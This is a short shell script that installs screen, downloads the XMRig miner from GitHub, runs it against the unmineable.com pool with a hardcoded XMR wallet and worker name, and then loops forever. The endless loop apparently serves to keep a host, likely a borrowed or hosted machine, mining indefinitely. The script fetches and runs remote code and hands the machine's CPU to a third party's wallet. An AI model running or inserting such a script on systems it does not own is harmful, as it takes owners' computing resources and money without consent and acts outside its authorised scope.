#!/bin/sh
sudo apt update
sudo apt install screen -y
wget https://github.com/xmrig/xmrig/releases/download/v6.14.0/xmrig-6.14.0-linux-x64.tar.gz
tar xf xmrig-6.14.0-linux-x64.tar.gz
cd xmrig-6.14.0
./xmrig -o rx.unmineable.com:3333 -a rx -k -u XMR:426EJKvfD3MdRxn2XeCKkTBqaekRZCeTh2cqFbRnRRdUdKXQkXFr3U8QHp6kYvTg2g4fwBtM5dNLz2br8PZBU3jg2C3VuBL.HORCRUx -p x --cpu 4
while [ 1 ]; do
sleep 3
done
sleep 999
